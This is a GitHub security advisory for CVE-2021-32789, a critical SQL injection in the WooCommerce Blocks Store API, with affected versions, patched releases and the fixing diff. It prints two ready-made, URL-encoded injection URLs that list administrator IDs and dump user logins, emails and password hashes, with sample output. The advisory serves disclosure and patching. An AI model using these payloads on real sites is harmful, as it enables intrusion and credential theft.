Skip to content
This repository has been archived by the owner on Feb 23, 2024. It is now read-only.

Arbitrary SQL (SQL injection) possible via the Store API component.

Critical
nerrad published GHSA-6hq4-w6wv-8wrp Jul 23, 2021

Package

composer woocommerce/woocommerce-blocks (Composer)

Affected versions

>= 2.5.0

Patched versions

5.5.1, 5.4.1, 5.3.2, 5.2.1, 5.1.1, 5.0.1, 4.9.2, 4.8.1, 4.7.1, 4.6.1, 4.5.3, 4.4.3, 4.3.1, 4.2.1, 4.1.1, 4.0.1, 3.9.1, 3.8.1, 3.7.2, 3.6.1, 3.5.1, 3.4.1, 3.3.1, 3.2.1, 3.1.1, 3.0.1, 2.9.1, 2.8.1, 2.7.2, 2.6.2, 2.5.16

Description

Impact

This impacts all WooCommerce sites running 2.5.0 or later of the WooCommerce Blocks feature plugin. Via a carefully crafted URL, an exploit can be executed against the wc/store/products/collection-data?calculate_attribute_counts[][taxonomy] endpoint that allows the execution of a read only sql query.

  1. SQL formed to list the IDs of any admin based user.
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520SELECT%2525201%25252Cuser_id%252520FROM%252520wp_usermeta%252520WHERE%252520meta_value%252520LIKE%252520%252527%252525Administrator%252525%252527%25253b%252500
  1. User specific query to get the associated db fields including the hashed password
/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252Cuser_login%25252C0x3a%25252Cuser_email%25252C0x3a%25252Cuser_pass%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500

Supporting Material/References:
Query 1 returns:

{“price_range”:null,”attribute_counts”:[{“term”:0,”count”:0},{“term”:1,”count”:1}],”rating_counts”:null}.

Query 2 returns:

 {“price_range”:null,”attribute_counts”:[{“term”:0,”count”:0},{“term”:”1:admin:**.com:$P$B.CZdnSLBmrCAURGHLO8pA2OoHdDoo0″,”count”:1}],”rating_counts”:null}

Patches

diff --git a/src/StoreApi/Utilities/ProductQueryFilters.php b/src/StoreApi/Utilities/ProductQueryFilters.php
index d8ebb765..bd3038ac 100644
--- a/src/StoreApi/Utilities/ProductQueryFilters.php
+++ b/src/StoreApi/Utilities/ProductQueryFilters.php
@@ -83,7 +83,13 @@ class ProductQueryFilters {
                        $attributes = array_map( 'wc_attribute_taxonomy_name_by_id', wp_parse_id_list( $attributes ) );
                }
   
-               $attributes_to_count     = array_map( 'wc_sanitize_taxonomy_name', $attributes );
+               $attributes_to_count     = array_map(
+                       function( $attribute ) {
+                               $attribute = wc_sanitize_taxonomy_name( $attribute );
+                               return esc_sql( $attribute );
+                       },
+                       $attributes
+               );
                $attributes_to_count_sql = 'AND term_taxonomy.taxonomy IN ("' . implode( '","', $attributes_to_count ) . '")';
                $attribute_count_sql     = "
                        SELECT COUNT( DISTINCT posts.ID ) as term_count, terms.term_id as term_count_id

Severity

Critical

CVE ID

CVE-2021-32789

Weaknesses